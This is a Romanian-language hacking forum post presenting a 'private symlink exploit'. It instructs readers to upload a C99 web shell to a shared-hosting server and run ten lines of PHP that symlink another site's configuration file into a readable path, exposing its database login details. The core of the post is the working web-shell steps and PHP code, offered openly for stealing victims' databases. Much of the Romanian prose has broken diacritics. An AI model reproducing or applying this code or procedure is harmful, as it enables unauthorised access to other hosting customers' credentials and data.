Jump to content
Aripipevant

Private Symlink (PHP) Exploit

Recommended Posts

Mai întâi de toate vom folosi func?ia symlink pentru a face o comand? rapid? pentru orice fi?ier sau folder vrem

de aceea aceast? func?ie v? va fi foarte util? pentru citirea oric?rui folder sau fi?ier (Pentru mai multe detalii Utiliza?i Google).

Aici am folosit Shell Named "C99" pentru a executa micul cod php (Eval Code) pe serverul de shared hosting.

Exploit-ul este folosit pentru a desc?rca baza de date a victimei dac? ?i numai dac? victima este într-un host comun

Desc?rca?i Shell-ul "C99 Shell" ?i urma?i pa?i.

Ob?ine?i Oricare Shell C99

/Pasul 1 $ Incarc? php i.e Shell_R-H.php

Shell root path (cale). Care este /home/hackerz/public_html .

/Pasul 2 $ Deschide?i fi?ierul înc?rcat.

http://www.yoursitename.com/shell_R-H.php

/Pasul 3 $ Urm?torul pas este s? citi?i cu aten?ie mai jos php Eval Code. Este vorba despre 10 linii php code

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

$filepath='/home/xx/public_html/xx.xx'; $sitepath='/home/xx/public_html/'; $writeblefilepath='myfile.txt';$flib=$sitepath.$wr iteblefilepath; @unlink($flib); symlink($filepath, $flib); echo readlink($flib) . "\n"; echo "<textarea cols=30 rows=10>".file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" . "tarea>"; @unlink($flib);

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

/Pasul 4 Înlocuirea (xx) pe urma (xx.xx) - (fi?ier-ul ?int?, utilizat de obicei pentru a citi fi?ierele bazei de date de configurare unde g?sim informa?ii de conectare.) EX: - "/home/fbi/public_html/configuration.php"

$writeblefilepath, acceseaz? în toate c?ile de scriere asupra site-ului. ?i, de asemenea, este utilizat pentru a face procesul - leg?tura.. scriere ?i ie?ire. Pentru @unlink îl pute?i c?uta pe php.net

Este cam vechi in arhiva mea dar merge :P

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.×
×
  • Create New...